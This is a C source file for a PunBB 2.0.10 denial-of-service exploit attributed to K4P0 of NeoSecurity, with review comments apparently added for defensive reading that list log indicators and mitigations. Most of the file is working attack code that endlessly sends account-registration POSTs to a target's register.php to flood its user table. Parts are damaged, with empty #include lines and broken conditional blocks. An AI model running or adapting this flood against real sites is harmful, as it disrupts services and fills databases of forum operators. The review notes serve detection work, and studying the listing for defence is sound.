/*
 * Name: NST-Exploit Punbb 2.0.10 Denial Of Service
 * Copyright: NeoSecurity
 * Author: K4P0
 *
 * [./]NST-XplPunbb www.victim.com 2.0.0.6 /punbb/
 * #################################################
 *  PunBB 2.0.10 Denial of Service exploit by K4P0
 *  Use only at your own reputation risk! ;)
 *  www.NeoSecurityTeam.net
 * #################################################
 * [1] - Trying if connection is possible...
 * [2] - Connected!
 * [3] - Flooding localhost...
 *
 * Use it at your own risk!.
 */

/*
 * Review notes (defensive reading of this listing).
 *
 * What the code does: after one connectivity check it loops without end.
 * Each pass opens a new TCP connection to port 80, sends a single POST to
 * <path>register.php?action=register, and closes the socket without reading
 * a reply. The form body carries a counter that starts at 0 on every run,
 * so each request asks for a different account name.
 *
 * Static values visible in SendPack() that can be matched in web-server,
 * application or IDS logs:
 *   - req_username ending in "__NsT" with a decimal prefix
 *   - req_email1 ending in "_peace@NsT.net" with the same prefix
 *   - req_password1/req_password2 "flood", timezone "-10"
 *   - a fixed User-Agent (Firefox/1.0.4 build string) together with
 *     "Keep-Alive: 300" and "Proxy-Connection: keep-alive"
 *   - header lines terminated by a bare LF, not CRLF
 *   - one short-lived connection per registration request from one source
 * All of these are trivially changeable by whoever runs the tool, so rate
 * and behaviour based controls matter more than string matches.
 *
 * Mitigation (general practice, not taken from this page): throttle
 * registrations per source address, require a verification step before an
 * account row is committed, and monitor the growth rate of the user table.
 *
 * State of the listing: the header names after each #include were lost when
 * the page was extracted, and the usage string in HowTo() appears to have
 * lost its argument placeholders the same way. Both are left as found.
 */

#define WINDOWS
//#define LINUX

/* Header names missing in this listing (see review notes above). */
#include
#include
#include
#ifdef WINDOWS
#include
#include
// Link to (lib)ws2_32.a
#else
#include
#include
#include
#endif

/* Loop condition for main(); constant 1, so the send loop never ends on its own. */
#define NST_ALIVE 1

int Connect(char*);
void SendPack(int, int, char*, char*);
void _perror(char*);
void HowTo(char*);

/*
 * Entry point.
 *
 * argv[1] is used as the Host/Referer name, argv[2] is passed to Connect()
 * as the address to dial, argv[3] is the path prefix placed before
 * register.php. Fewer than three arguments prints usage and exits.
 */
int main(int argc, char* argv[])
{
    int vict_sock, dos = 0;

    puts("#################################################");
    puts(" PunBB 2.0.10 Denial of Service exploit by K4P0 ");
    puts(" Use only at your own reputation risk! ;) \n");
    puts(" www.NeoSecurityTeam.net ");

    /* HowTo() does not return; it prints the closing banner line itself. */
    if(argc < 4) HowTo(argv[0]);

    puts("#################################################\n");
    /* argv[1] is passed but the format string has no conversion for it. */
    printf("[1] - Trying if connection is possible...\n", argv[1]);
    fflush(stdout);

    /* One throw-away connection as a reachability check; Connect() exits on failure. */
    vict_sock = Connect(argv[2]);
    printf("[2] - Connected!\n");
    printf("[3] - Flooding %s", argv[1]);

    #ifdef WINDOWS
    closesocket(vict_sock);
    #else
    close(vict_sock);
    #endif

    while(NST_ALIVE)
    {
        /* Progress dot on stderr every tenth request. */
        if(!(dos % 10)) fprintf(stderr, ".");

        /* New connection per request; `dos` becomes the unique part of the account name. */
        vict_sock = Connect(argv[2]);
        SendPack(vict_sock, dos, argv[3], argv[1]);
        dos++;

        #ifdef WINDOWS
        closesocket(vict_sock);
        /* Pairs with the WSAStartup() that Connect() performs on every call. */
        WSACleanup();
        #else
        close(vict_sock);
        #endif
    }

    return 0;
}

// I'm to lazy to use gethostby(addr|name) :)
/*
 * Open a TCP connection to port 80 of the given address and return the socket.
 *
 * IP goes straight to inet_addr(), so only a dotted IPv4 string is handled
 * and the conversion result is not checked. Every failure path terminates
 * the process (exit(-1) directly or through _perror()).
 */
int Connect(char* IP)
{
    struct sockaddr_in *_addr;
    int vict_sck;

    #ifdef WINDOWS
    WSADATA wsaData;
    if(WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
    {
        //WSAGetLastError()? Nah...
        fprintf(stderr, "[*] WSAStartup() failed");
        exit(-1);
    }
    #endif

    if(!(_addr=(struct sockaddr_in *)malloc(sizeof(struct sockaddr_in))))
    {
        fprintf(stderr, "[*] Unable to reserve memory");
        exit(-1);
    }

    memset(_addr, 0x0, sizeof(struct sockaddr_in));
    _addr->sin_family = AF_INET;
    _addr->sin_port = htons(80); /* destination port is fixed to 80 (plain HTTP) */
    _addr->sin_addr.s_addr = inet_addr(IP);

    /* NOTE(review): the conditional structure of this section looks damaged
     * by extraction of the listing; it is reproduced as found. */
    #ifdef WINDOWS
    if((vict_sck = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0)
    {
        fprintf(stderr, "WSASocket() failed");
        exit(-1);
    }
    else if((vict_sck = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
        _perror("socket() ");
    #endif

    if(connect(vict_sck, (struct sockaddr *)_addr, sizeof(struct sockaddr)) < 0)
        _perror("connect() ");

    free(_addr);
    return vict_sck;
}

/*
 * Build one HTTP registration request and send it on v_sck.
 *
 * v_sck: connected socket from Connect().
 * var:   counter from main(); formatted into the username and e-mail fields.
 * path:  prefix placed before register.php (argv[3]).
 * DNS:   value for the Host header and the Referer URL (argv[1]).
 *
 * The three buffers have fixed sizes (2048/1024/512) and are filled with
 * sprintf()/strcat() without length checks, so path and DNS lengths are
 * unbounded relative to the buffer. The result of send() is not checked
 * and no response is read.
 */
void SendPack(int v_sck, int var, char* path, char* DNS)
{
    char *HTTP_PACK, *HTTP_MPCK, *HTTP_POST;

    if(!(HTTP_PACK = (char *)malloc(2048)) || !(HTTP_MPCK = (char *)malloc(1024)) || !(HTTP_POST = (char *)malloc(512)))
    {
        fprintf(stderr, "Error trying to reserver memory");
        exit(-1);
    }

    /* Request line and static headers; note the LF-only line endings and
     * the constant User-Agent, both usable as log/IDS match criteria. */
    sprintf(HTTP_PACK, "POST %sregister.php?action=register HTTP/1.1\n"
                       "Host: %s\n"
                       "User-Agent: Mozilla/5.0 Gecko/20050511 Firefox/1.0.4\n"
                       "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"
                       "Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3\n"
                       "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n"
                       "Keep-Alive: 300\n"
                       "Proxy-Connection: keep-alive\n"
                       "Referer: http://%s%sregister.php\n"
                       "Content-Type: application/x-www-form-urlencoded\n", path, DNS, DNS, path);

    /* Form body: the counter makes username and e-mail unique per request;
     * the "__NsT" / "_peace@NsT.net" suffixes and "flood" password are constant. */
    sprintf(HTTP_POST, "form_sent=1&req_username=%d__NsT&req_password1=flood&req_password2=flood&"
                       "req_email1=%d_peace@NsT.net&timezone=-10&email_setting=1", var, var);

    /* strlen() yields size_t but is formatted with %d. */
    sprintf(HTTP_MPCK, "Content-Length: %d\n\n", strlen(HTTP_POST));

    strcat(HTTP_PACK, HTTP_MPCK);
    strcat(HTTP_PACK, HTTP_POST);

    send(v_sck, HTTP_PACK, strlen(HTTP_PACK), 0);

    free(HTTP_PACK);
    free(HTTP_MPCK);
    free(HTTP_POST);
    return;
}

/* Print msg with the current errno text via perror(), flush stdout, and exit with -1. */
void _perror(char* msg)
{
    perror(msg);
    fflush(stdout);
    exit(-1);
}

/*
 * Print usage to stderr and exit with status 0.
 *
 * The first format string shows only the program name; the argument
 * placeholders appear to have been lost in extraction (unconfirmed).
 */
void HowTo(char* program)
{
    fprintf(stderr, "%s \n", program);
    fprintf(stderr, "f.e: ./NsT-XplPunbb www.victim.com 2.0.0.6 /punbb/\n");
    fprintf(stderr, "#################################################");
    exit(0);
}

// milw0rm.com [2006-02-20]